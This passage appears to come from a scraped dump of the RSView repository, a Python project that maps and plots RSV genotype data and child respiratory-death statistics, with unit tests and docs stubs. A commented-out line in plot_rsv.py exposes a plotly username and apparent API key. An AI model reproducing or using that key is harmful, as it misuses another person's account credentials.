==\n len(organized_df) for col in organized_df.columns)\n\n #Don't actually produce plot, just test function components\n @patch(\"rsview.map_rsv.py.plot\")\n def test_map_rsv(self, mock_show):\n \"\"\"\n Test map_rsv.map_rsv function with different arguments\n \"\"\"\n #Test level='subtype'\n fig = self.run_map_rsv('subtype', 'data')\n\n self.assertEqual(len(fig['data']), len(self.run_count_types('subtype', 'data'))+2)\n 
self.assertEqual(len(fig['layout']['sliders'][0]['steps']), (int(2018-1980)+1))\n self.assertTrue('subtype' in fig['data'][0]['hovertext'])\n\n #Test level='subtype', years = 'all'\n fig = self.run_map_rsv('subtype', 'data', years='all')\n year_range = [yr for yr in range(int(self.run_count_types('subtype', 'data').year.min()),\n int(self.run_count_types('subtype', 'data').year.max()))]\n\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), len(year_range))\n\n #Test level='genotype'\n fig = self.run_map_rsv('genotype', 'data')\n organized_df = self.run_count_types('genotype', 'data')\n a_groups = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype_group'].tolist()))\n b_groups = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype_group'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_groups+b_groups))\n self.assertTrue('genotype_group' in fig['data'][0]['hovertext'])\n\n #Test level='genotype', genotype_level='all'\n fig = self.run_map_rsv('genotype', 'data', genotype_level='all')\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_genotypes+b_genotypes))\n self.assertTrue('genotype' in fig['data'][0]['hovertext'])\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.369047611951828,
"alphanum_fraction": 0.369047611951828,
"avg_line_length": 13,
"blob_id": "35312c881b6fc383c82c41a4fa0a8458a5f06d65",
"content_id": "30424adb06a80baa875890b90c41242ea021e083",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 6,
"path": "/docs/map_rsv.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "==============\n``map_rsv.py``\n==============\n\n.. automodule:: map_rsv\n :members:\n"
},
{
"alpha_fraction": 0.5715253949165344,
"alphanum_fraction": 0.5854237079620361,
"avg_line_length": 33.30232620239258,
"blob_id": "ba16087c5799c076557aa9eb87f7a6f78571819e",
"content_id": "2de6b7c7bf60f42868bc4e6c2a922e977c5a495f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 86,
"path": "/rsview/tests/test_seq_download.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Test rsview.seq_download.py\"\"\"\nimport unittest\nfrom Bio import Entrez\nimport rsview.seq_download as seq_download\n\n# constants for testing\nEMAIL = '[email protected]'\nDB = 'nuccore'\nRETMAX = 5\nTERM = 'human respiratory syncytial virus G'\n\n#GT_A and GT_B lists based on genotypes already known to be present.\nGT_A_LIST = ['ON1', 'GA1', 'GA2', 'GA3', 'GA5', 'GA6', 'GA7', 'NA1', 'NA2',\n 'NA3', 'SAA1', 'SAA2']\nGT_B_LIST = ['BA', 'BA2', 'BA4', 'BA5', 'BA7', 'BA8', 'BA9', 'BA10', 'BA11',\n 'BA12', 'BA14', 'THB', 'SAB1', 'SAB3', 'SAB4', 'GB1', 'GB2',\n 'GB3', 'GB4', 'GB13', 'GB12']\n\nTEST_DICTS = [{'organism': 'Human respiratory syncytial virus A'},\n {'organism': 'Human orthopneumovirus', 'strain': 'RSVB'},\n {'organism': 'Human paramyxovirus', 'note': 'subtype: A, '\\\n 'genotype: NA1'}, {'organism': 'Human orthopneumovirus'}]\n\nTEST_SUBTYPES = ['A', 'B', 'A', '']\nTEST_GENOTYPES = ['', '', 'NA1', '']\n\nCOLUMNS = ['G_seq', 'genotype', 'subtype', 'collection_date', 'country']\n\n\nclass TestSeqDownload(unittest.TestCase):\n \"\"\"\n Tests seq_download.py\n \"\"\"\n\n def test_getids(self):\n \"\"\"Make sure Entrez query returns expected number of seq IDs.\"\"\"\n Entrez.email = EMAIL\n self.assertTrue(len(seq_download.getids(DB, RETMAX, TERM)) == RETMAX)\n\n\n def test_find_subtype(self):\n \"\"\"Make sure get correct subtypes from toy data.\"\"\"\n for (i, test_subtype) in enumerate(TEST_SUBTYPES):\n self.assertTrue(seq_download.find_subtype(\n TEST_DICTS[i]) == test_subtype)\n\n\n def test_find_genotype(self):\n \"\"\"Makes sure genotype added to toy dicts.\n Assumes `test_find_subtype` passes.\n Make sure assigns correct genotypes basd on toy data.\n \"\"\"\n for (i, test_dict) in enumerate(TEST_DICTS):\n test_dict['subtype'] = TEST_SUBTYPES[i]\n genotyped_dict = seq_download.find_genotype(\n test_dict, GT_A_LIST, GT_B_LIST)\n self.assertTrue('genotype' in genotyped_dict.keys())\n self.assertTrue(genotyped_dict['genotype'] == TEST_GENOTYPES[i])\n \n\n def test_makedf(self):\n \"\"\"Test dataframe creation from small download.\n\n This does not test `seq_download.gethandle()` as that function is\n essentially just an implementation of `Entrez.efetch`, which is not\n maintained by this project.\n \"\"\"\n # This assumes test_getids passes\n ids = seq_download.getids(DB, RETMAX, TERM)\n firstseq = 0\n rettype = 'gb'\n retmode = 'xml'\n handle = seq_download.gethandle(DB, ids, firstseq, RETMAX,\n rettype, retmode)\n\n test_df = seq_download.makedf(handle)\n\n self.assertTrue(len(ids) == len(test_df))\n\n for column in COLUMNS:\n self.assertTrue(column in list(test_df))\n\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6241549253463745,
"alphanum_fraction": 0.6437054872512817,
"avg_line_length": 31.005847930908203,
"blob_id": "d32129dadd22aa35a2291e09f434e8bc56562f7c",
"content_id": "82b427c13e954a21d369d33574f2954f7022a69f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5473,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 171,
"path": "/rsview/plot_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" Can generate plots of RSV health data on a summary or individual country level \"\"\"\n\nimport pandas as pd\nimport country_converter as coco\nimport plotly.graph_objs as go\nfrom plotly.offline import plot\n\nfrom parsearguments import plot_parser\n\n\n# import rsview.parsearguments\n\n# plotly.tools.set_credentials_file(username='jillianeb', api_key='eOsTljd6vVMiyuy4Msy0')\n# plotly.tools.set_config_file(world_readable=False,\n# sharing='private')\n\n\ndef dict_to_help(data_types):\n \"\"\" Turns DATA_DICT into readable format for help text \"\"\"\n output = \"\"\n for item in data_types:\n output = output + \" \" + item + \": \"\n output = output + data_types[item] + \"\\n\"\n return output\n\ndef make_df_health_summary(datadir):\n \"\"\"\n Returns summary dataframe from health data at specified location\n \"\"\"\n df_health_summary = pd.read_csv(str(datadir) + '/health_data_summary.csv')\n return df_health_summary\n\ndef make_df_health_all(datadir):\n \"\"\"\n Returns full dataframe from health data at specified location\n \"\"\"\n df_health_all = pd.read_csv(str(datadir) + '/health_data_all.csv')\n return df_health_all\n\nDATA_DICT = {\n 'nnd':'Total Neonatal Deaths',\n 'pnd':'Total Post-Neonatal Deaths',\n 'neo9':'Neonatal deaths due to Acute Respiratory Infection',\n 'post9':'Post-neonatal deaths due to Acute Respiratory Infection',\n 'ufive9':'Underfive deaths due to Acute Respiratory Infection',\n 'rneo9':'Neonatal death rate from Acute Respiratory Infection (per 1000 live births)',\n 'rpost9':'Post-neonatal death rate from Acute Respiratory Infection (per 1000 live births)',\n 'rufive9':'Underfive death rate from Acute Respiratory Infection (per 1000 live births)',\n 'fneo9':'Percent Neonatal deaths due to Acute Respiratory Infection',\n 'fpost9':'Percent Post-neonatal deaths due to Acute Respiratory Infection',\n 'fufive9':'Percent Underfive deaths due to Acute Respiratory Infection'}\n\ndef input_to_country(country_input):\n \"\"\" Takes user input for country and converts it to short country name \"\"\"\n if country_input in ('Global', 'global'):\n return 'Global'\n country = coco.convert(names=country_input, to='name_short')\n return country\n\n\ndef is_country_present(dataframe, country):\n \"\"\" Checks if user input country is a valid country in the dataset \"\"\"\n iso3 = coco.convert(names=country, to='ISO3')\n # process some error if coco can't convert to a country\n\n in_dataset = iso3 in dataframe['iso3']\n return in_dataset\n\n\ndef plot_summary(data_type, datadir, highlight_country=None):\n \"\"\" Plots summary health data. 
If a highlight_country is specified, it will be highlighted \"\"\"\n\n df_health_summary = make_df_health_summary(datadir)\n\n color_dict = ['rgba(204,204,204,1)'] * len(df_health_summary)\n color_highlight = color_dict.copy()\n\n\n\n df_sorted = df_health_summary.sort_values(data_type)\n df_sorted = df_sorted.reset_index(drop=True)\n\n if highlight_country is not None:\n country_short = input_to_country(highlight_country)\n highlight_index = df_sorted.index[df_sorted['country_short'] == country_short].values[0]\n #highlight_index = 186\n color_highlight[highlight_index] = 'rgba(222,45,38,0.8)'\n\n trace1 = go.Bar(\n x=df_sorted['country_short'],\n y=df_sorted[data_type],\n name='neo9',\n marker=dict(\n color=color_highlight\n ),\n )\n\n data = [trace1]\n layout = go.Layout(\n title=DATA_DICT[data_type] + '<br> Averaged from 2000-2016',\n yaxis=dict(\n #title='Percent',\n titlefont=dict(\n size=16,\n color='rgb(107, 107, 107)'\n ),\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n ),\n )\n\n fig = go.Figure(data=data, layout=layout)\n\n plot(fig)\n\n #return py.iplot(fig, filename='stacked-bar', world_readable=True)\n #return plot(fig, filename='stacked-bar', world_readable=True)\n\n\n\ndef plot_country(data_type, datadir, country='Global'):\n \"\"\" Plots health data for a specified country over time \"\"\"\n\n country_short = input_to_country(country)\n\n df_health_all = make_df_health_all(datadir)\n df_country1 = df_health_all[(df_health_all['country_short'] == country_short)]\n\n color_dict = ['rgba(204,204,204,1)'] * len(df_health_all)\n\n trace1 = go.Bar(\n x=df_country1['year'],\n y=df_country1[data_type],\n name=DATA_DICT[data_type] + ' in ' + country,\n marker=dict(\n color=color_dict\n ),\n )\n\n data = [trace1]\n layout = go.Layout(\n title=DATA_DICT[data_type] + ' in ' + country,\n yaxis=dict(\n #title='Averaged from 2000-2016',\n ),\n )\n\n\n fig = go.Figure(data=data, layout=layout)\n\n plot(fig)\n\n #return py.iplot(fig, filename='stacked-bar', world_readable=True)\n\n\ndef main(level, data_type, datadir, country='Global', highlight_country=None):\n \"\"\" Processes user inputs to generate the specified graphs \"\"\"\n\n if level != 'country':\n return plot_summary(data_type, datadir, highlight_country)\n return plot_country(data_type, datadir, country)\n\nif __name__ == \"__main__\":\n\n ARGS = plot_parser(dict_to_help(DATA_DICT)).parse_args()\n\n main(\n ARGS.level, ARGS.data_type, ARGS.datadir, country=ARGS.country,\n highlight_country=ARGS.highlight_country)\n"
},
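plot_summary() above reduces to a grey color list with one red entry at the sorted position of the highlighted country. The pandas part of that logic in isolation (country names and rates below are invented):

import pandas as pd

df = pd.DataFrame({'country_short': ['Kenya', 'Peru', 'India'],
                   'rufive9': [3.1, 1.2, 2.4]})  # made-up death rates
df_sorted = df.sort_values('rufive9').reset_index(drop=True)

colors = ['rgba(204,204,204,1)'] * len(df_sorted)
idx = df_sorted.index[df_sorted['country_short'] == 'Kenya'].values[0]
colors[idx] = 'rgba(222,45,38,0.8)'  # one highlighted bar, as plot_summary() does
print(list(zip(df_sorted['country_short'], colors)))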
{
"alpha_fraction": 0.39772728085517883,
"alphanum_fraction": 0.39772728085517883,
"avg_line_length": 13.666666984558105,
"blob_id": "c1e4766697e61d11f8128e4b993dec5981c05327",
"content_id": "20f0dfd3e7369c655dc5768d71196bf90bcfcb9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 88,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 6,
"path": "/docs/genotype.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "===============\n``genotype.py``\n===============\n\n.. automodule:: genotype\n :members:\n"
},
{
"alpha_fraction": 0.5590388178825378,
"alphanum_fraction": 0.5659916996955872,
"avg_line_length": 31.53174591064453,
"blob_id": "d410b8d162eccad95551157acdefd57b14c9ac2a",
"content_id": "42920e65d33a193f3c8a3da826706538e294198e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8198,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 252,
"path": "/rsview/plot_correlation.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" Plot the correlation between RSV subtype prevalence and health metrics \"\"\"\n\nimport pandas as pd\nimport country_converter as coco\nfrom plotly.offline import plot\nimport plotly.graph_objs as go\n\nimport map_rsv\nimport plot_rsv\n\nfrom parsearguments import correlation_parser\n\n# import rsview.parsearguments\n\n# from parsearguments import correlationParser\n\ndef country_to_iso3(country):\n \"\"\" Take user country input and convert to ISO3 to access dataframe \"\"\"\n if country == 'Global':\n return 'Global'\n iso3 = coco.convert(names=country, to='ISO3')\n return iso3\n\ndef count_subtypes(rsv_df):\n \"\"\"\n Restructure the DataFrame so that each row indicates the total number of RSV sequences\n found in each country, for each subtype (added across all years)\n \"\"\"\n\n #count number of rows(seqs) from each country that are each subtype\n df_group = pd.DataFrame({'count' : rsv_df.groupby(['country', 'subtype']).size()}).reset_index()\n\n return df_group\n\n\ndef count_subtypes_year(rsv_df):\n \"\"\"\n Restructure the DataFrame so that each row indicates the total number of RSV sequences\n found in each country, each year, for each subtype\n \"\"\"\n\n #count number of rows(seqs) from each country that are each subtype\n df_group = pd.DataFrame({'count' : rsv_df.groupby(\n ['country', 'subtype', 'year']).size()}).reset_index()\n\n return df_group\n\ndef get_ratio_all(dataframe):\n \"\"\"\n From counted subtypes, calculate the ratio of subtype A over subtype B in each country\n \"\"\"\n df_ratio = pd.DataFrame(columns=['country', 'ratio', 'count_A', 'count_B', 'count_total'])\n countries = dataframe['country'].unique()\n for i in countries:\n country_df = dataframe[dataframe['country'] == i]\n if country_df['subtype'].count() == 1:\n lone_subtype = country_df['subtype'].item()\n if lone_subtype == 'A':\n percent_a = 1\n count_a = country_df['count'].item()\n count_b = 0\n count_total = count_a + count_b\n\n else:\n percent_a = 0\n count_a = 0\n count_b = country_df['count'].item()\n count_total = count_a + count_b\n else:\n count_a = float(country_df[country_df['subtype'] == 'A']['count'])\n count_b = float(country_df[country_df['subtype'] == 'B']['count'])\n percent_a = count_a/(count_a + count_b)\n count_total = count_a + count_b\n df_ratio = df_ratio.append(\n pd.Series([i, percent_a, count_a, count_b, count_total],\n index=df_ratio.columns, name=i))\n return df_ratio\n\ndef get_ratio_year(dataframe):\n \"\"\"\n From counted subtypes, calculate the ratio of subtype A\n over subtype B in each country, each year\n \"\"\"\n df_ratio = pd.DataFrame(\n columns=['country', 'year', 'ratio', 'count_A', 'count_B', 'count_total'])\n countries = dataframe['country'].unique()\n for i in countries:\n country_df = dataframe[dataframe['country'] == i]\n years = country_df['year'].unique()\n for j in years:\n years_df = country_df[country_df['year'] == j]\n if years_df['subtype'].count() == 1:\n lone_subtype = years_df['subtype'].item()\n if lone_subtype == 'A':\n percent_a = 1\n count_a = years_df['count'].item()\n count_b = 0\n count_total = count_a + count_b\n else:\n percent_a = 0\n count_a = 0\n count_b = years_df['count'].item()\n count_total = count_a + count_b\n else:\n count_a = float(years_df[years_df['subtype'] == 'A']['count'])\n count_b = float(years_df[years_df['subtype'] == 'B']['count'])\n percent_a = count_a/(count_a + count_b)\n count_total = count_a + count_b\n df_ratio = df_ratio.append(\n pd.Series([i, j, percent_a, count_a, count_b, count_total],\n 
index=df_ratio.columns, name=i))\n return df_ratio\n\n\ndef merge_ratio_health(df_ratio, datadir):\n \"\"\"\n Merge the RSV sequence dataframe with calculated ratios with the health dataframe\n \"\"\"\n df_health_summary = plot_rsv.make_df_health_summary(datadir)\n df_ratio[\"iso3\"] = [country_to_iso3(x) for x in df_ratio.country.values]\n\n df_merge = pd.merge(df_ratio, df_health_summary, how='inner', on=['iso3'])\n\n return df_merge\n\ndef merge_ratio_health_year(df_ratio, datadir):\n \"\"\"\n Merge the RSV sequence dataframe with yearly calculated ratios with the health dataframe\n \"\"\"\n df_health_all = plot_rsv.make_df_health_all(datadir)\n df_ratio[\"iso3\"] = [country_to_iso3(x) for x in df_ratio.country.values]\n\n df_merge = pd.merge(df_ratio, df_health_all, how='inner', on=['iso3', 'year'])\n\n return df_merge\n\n\n\ndef plot_ratio(df_merge, data_type):\n \"\"\"\n Plot the calculated subtype ratios\n \"\"\"\n trace1 = go.Scatter(\n x=df_merge['ratio'],\n y=df_merge[data_type],\n mode='markers',\n marker=dict(size=14,\n line=dict(width=1),\n color='rgba(204,204,204,1)'\n ),\n text=df_merge['country_short'] # The hover text goes here\n )\n\n layout = go.Layout(\n title='RSV Subtype Prevalence compared to ' + plot_rsv.DATA_DICT[data_type],\n hovermode='closest',\n xaxis=dict(\n title='Ratio of Subtype A over Subtype B Sequences Recorded',\n # ticklen= 5,\n # zeroline= False,\n # gridwidth= 2,\n ),\n yaxis=dict(\n title=plot_rsv.DATA_DICT[data_type],\n # ticklen= 5,\n # gridwidth= 2,\n ),\n showlegend=False\n )\n\n data = [trace1]\n\n fig = go.Figure(data=data, layout=layout)\n plot(fig)\n\n\n\ndef plot_ratio_year(df_merge, data_type):\n \"\"\"\n Plot the calculated subtype ratios for each year\n \"\"\"\n\n df_merge['hover'] = df_merge['country_short'] + ', ' + df_merge['year'].astype(int).map(str)\n\n trace1 = go.Scatter(\n x=df_merge['ratio'],\n y=df_merge[data_type],\n mode='markers',\n marker=dict(size=14,\n line=dict(width=1),\n color=df_merge['year'],\n colorscale='RdBu',\n showscale=True,\n # cmin=1990,\n # cmax=2018\n ),\n text=df_merge['hover'] # The hover text goes here\n )\n\n layout = go.Layout(\n title='RSV Subtype Prevalence compared to ' + plot_rsv.DATA_DICT[data_type],\n hovermode='closest',\n xaxis=dict(\n title='Ratio of Subtype A over Subtype B Sequences Recorded',\n # ticklen= 5,\n # zeroline= False,\n # gridwidth= 2,\n ),\n yaxis=dict(\n title=plot_rsv.DATA_DICT[data_type],\n # ticklen= 5,\n # gridwidth= 2,\n ),\n showlegend=False\n )\n\n data = [trace1]\n\n fig = go.Figure(data=data, layout=layout)\n plot(fig)\n\n\n\ndef main(level, data_type, datadir):\n \"\"\"\n Organize genotype data and plot correlation between subtypes and health metrics\n \"\"\"\n rsv_df = map_rsv.organize_data(datadir, map_rsv.GENOTYPE_DICT)\n rsv_df = rsv_df.dropna(subset=['subtype']).copy()\n\n rsv_df_year = rsv_df.dropna(subset=['year']).copy()\n rsv_df_year['year'] = rsv_df_year['year'].astype(int)\n\n if level == 'all':\n rsv_df_count = count_subtypes(rsv_df)\n df_ratio_all = get_ratio_all(rsv_df_count)\n df_merged = merge_ratio_health(df_ratio_all, datadir)\n plot_ratio(df_merged, data_type)\n\n else:\n rsv_df_count = count_subtypes_year(rsv_df)\n df_ratio_year = get_ratio_year(rsv_df_count)\n df_merged = merge_ratio_health_year(df_ratio_year, datadir)\n plot_ratio_year(df_merged, data_type)\n\n\n\nif __name__ == \"__main__\":\n\n ARGS = correlation_parser(plot_rsv.dict_to_help(plot_rsv.DATA_DICT)).parse_args()\n\n main(ARGS.level, ARGS.data_type, ARGS.datadir)\n"
},
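get_ratio_all() above boils down to an A/(A+B) fraction per country, with a special case when only one subtype was ever sequenced there. The same arithmetic on a toy counts table (numbers invented):

import pandas as pd

counts = pd.DataFrame({'country': ['Kenya', 'Kenya', 'Peru'],
                       'subtype': ['A', 'B', 'A'],
                       'count': [30, 10, 5]})

for country, grp in counts.groupby('country'):
    count_a = float(grp.loc[grp['subtype'] == 'A', 'count'].sum())
    count_b = float(grp.loc[grp['subtype'] == 'B', 'count'].sum())
    ratio = count_a / (count_a + count_b)  # 1.0 for Peru: only subtype A seen
    print(country, ratio)  # -> Kenya 0.75, Peru 1.0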
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6071428656578064,
"avg_line_length": 17.66666603088379,
"blob_id": "689b054826914ede045f211054cd557138c6b76a",
"content_id": "28153c2df51f43394d56a91c6f9809a59306944e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 3,
"path": "/rsview/tests/__init__.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Test submodule for rsview\"\"\"\n\n__version__ = '0.dev1'\n"
}
] | 25 |